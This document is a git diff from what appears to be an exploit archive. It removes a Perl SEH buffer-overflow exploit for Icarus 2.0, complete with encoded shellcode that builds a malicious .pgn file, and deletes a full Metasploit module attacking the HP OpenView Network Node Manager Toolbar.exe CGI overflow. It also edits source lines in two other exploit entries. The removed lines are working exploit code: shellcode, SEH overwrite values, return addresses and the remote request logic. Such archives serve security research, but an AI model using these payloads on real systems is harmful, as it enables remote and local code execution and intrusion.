-#!/user/bin/perl -#Icarus 2.0 (.PGn File)Universal Local BOF (SEH) -#tested on win SP2 -#Author: germaya_x & D3v!LFUCK3R -#Download :http://www.randomsoftware.com/pub/icarus.exe -#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :) -#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com members :) -############################################################# -my $bof="A" x 332 ; -my $NEXT_sEh="\xEB\x06\x90\x90"; -my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -################################################################### -open(myfile,'>> exploit.pgn'); -print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec; -################################################################### \ No newline at end of file diff --git a/platforms/windows/local/14566.c b/platforms/windows/local/14566.c index ccced271d..49e4a67ba 100755 --- a/platforms/windows/local/14566.c +++ b/platforms/windows/local/14566.c @@ -1,6 +1,5 @@ -source: -http://www.ragestorm.net/blogs/?p=255 -http://secunia.com/advisories/40870/ +source: http://www.ragestorm.net/blogs/?p=255 +source: http://secunia.com/advisories/40870/ DEVMODE dm = {0}; diff --git a/platforms/windows/remote/17536.rb b/platforms/windows/remote/17536.rb deleted file mode 100755 index b7de103df..000000000 --- a/platforms/windows/remote/17536.rb +++ /dev/null @@ -1,74 +0,0 @@ -## -# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. - By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute - arbitrary code. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 13192 $', - 'References' => - [ - [ 'CVE', '2008-0067' ], - [ 'OSVDB', '53222' ], - [ 'BID', '33147' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Privileged' => false, - 'Payload' => - { - 'Space' => 650, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 7 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) - end - - def exploit - - sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded - - print_status("Trying target #{target.name}...") - - send_request_raw({ - 'uri' => "/OvCgi/Toolbar.exe?" + sploit, - 'method' => "GET", - }, 5) - - - handler - - end - -end diff --git a/platforms/windows/remote/20528.html b/platforms/windows/remote/20528.html index a423bdca6..0f79b8e6d 100755 --- a/platforms/windows/remote/20528.html +++ b/platforms/windows/remote/20528.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2167/exploit +source: http://www.securityfocus.com/bid/2167/info Windows Media Player is an application used for digital audio, and video content viewing. It can be embedded in webpages as an ActiveX control.